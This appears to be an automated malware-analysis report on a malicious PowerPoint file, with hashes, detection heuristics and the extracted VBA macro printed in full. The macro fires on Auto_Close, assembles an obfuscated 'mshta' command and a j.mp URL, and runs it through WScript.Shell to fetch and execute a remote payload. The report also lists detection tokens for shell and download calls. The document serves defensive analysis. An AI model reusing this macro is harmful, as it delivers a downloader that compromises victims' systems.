Office (OLE) / .PPT malware analysis — malicious · 611d0b9d3351d6fa

MALICIOUS

Office (OLE) / .PPT

86.5 KB Created: 2020-08-04 21:46:59 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13

MD5: 0bb72a9b37c511306307c5042a88f80d SHA-1: b0bc88aaf2cc986bf8fa7c04266a8bb1e416d419 SHA-256: 611d0b9d3351d6faf479a1821b302e4c6daefd849e14531a58456eaa40db5246

108 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros that are triggered by the Auto_Close event. These macros construct a URL 'http:// @j.mp/asasdaxaeeedxaskasddkaos' and a command 'mshta '. The `CreateObject` function is used to instantiate a `WScript.Shell` object, which then executes the constructed command and URL, likely to download and execute a second-stage payload. The use of `CreateObject` and `Shell` execution points to a malicious intent to compromise the system.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Auto_CloSe()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1597 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1597 bytes
SHA-256: `d9bc596f2bfb014eb66a4916e86ddb9b21176a6fe2cf3a7820b233bd299b8a0c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ab1" Function suckmydickfornoreason11() suckmydickfornoreason6 = "h" suckmydickfornoreason7 = "t" suckmydickfornoreason8 = "t" suckmydickfornoreason9 = "p://%20%20@j.mp/asasdaxaeeedxaskasddkaos" antivirusarescam_6 = suckmydickfornoreason6 antivirusarescam_7 = suckmydickfornoreason7 antivirusarescam_8 = suckmydickfornoreason8 antivirusarescam_9 = suckmydickfornoreason9 suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9 End Function Attribute VB_Name = "main" Sub _ Auto_CloSe() yari End Sub Attribute VB_Name = "ab2" Function suckmydickfornoreason10() suckmydickfornoreason1 = "m" suckmydickfornoreason2 = "s" suckmydickfornoreason3 = "h" suckmydickfornoreason4 = "t" suckmydickfornoreason5 = "a " antivirusarescam_1 = suckmydickfornoreason1 antivirusarescam_2 = suckmydickfornoreason2 antivirusarescam_3 = suckmydickfornoreason3 antivirusarescam_4 = suckmydickfornoreason4 antivirusarescam_5 = suckmydickfornoreason5 suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5 End Function Attribute VB_Name = "po1" Function hireme() thisis = "WScr" your = "ipt." fucking = "She" security = "ll" iamhere = thisis totellyou = your yoursecurity = fucking sucks = security hireme = iamhere + totellyou + yoursecurity + sucks End Function Attribute VB_Name = "final" Function yari() CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11 End Function

SHA-256: d9bc596f2bfb014eb66a4916e86ddb9b21176a6fe2cf3a7820b233bd299b8a0c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%20%20@j.mp/asasdaxaeeedxaskasddkaos"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "main"
Sub _
Auto_CloSe()
yari
End Sub

Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function





Attribute VB_Name = "final"
Function yari()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.